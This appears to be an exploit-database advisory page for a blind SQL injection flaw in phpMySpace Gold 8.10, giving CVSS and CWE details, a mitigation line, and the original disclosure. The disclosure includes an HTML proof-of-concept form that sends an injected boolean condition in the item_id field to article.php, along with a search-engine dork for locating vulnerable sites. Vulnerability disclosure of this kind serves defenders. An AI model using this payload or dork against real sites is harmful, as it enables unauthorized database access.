phpMySpace Gold SQL Injection Vulnerability

vendor:

phpMySpace Gold

by:

John Martinelli

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpMySpace Gold

Affected Version From: 8.1

Affected Version To: 8.1

Patch Exists: NO

Related CWE:

CPE: a:phpmyspace:phpmyspace_gold:8.10

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

phpMySpace Gold SQL Injection Vulnerability

An SQL-injection vulnerability exists in phpMySpace Gold 8.10, allowing attackers to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Implement proper input validation and sanitization techniques to prevent SQL injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23602/info

phpMySpace Gold is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

phpMySpace Gold 8.10 is vulnerable; other versions may also be affected.

<html> <head><title>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit</title><body> <center><br><br><font size=4>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22">"Powered by Ripe Website Manager"</a></font><br> <br><br> <form action="http://www.example.com/path/modules/news/article.php" method="get"> <input name="mode" type="hidden" value="0"> <input name="order" type="hidden" value="0"> <input name="item_id" size=75 value="1" AND "1"="0"> <input type=submit value="Execute SQL Injection" class="button"> </form> </body></html>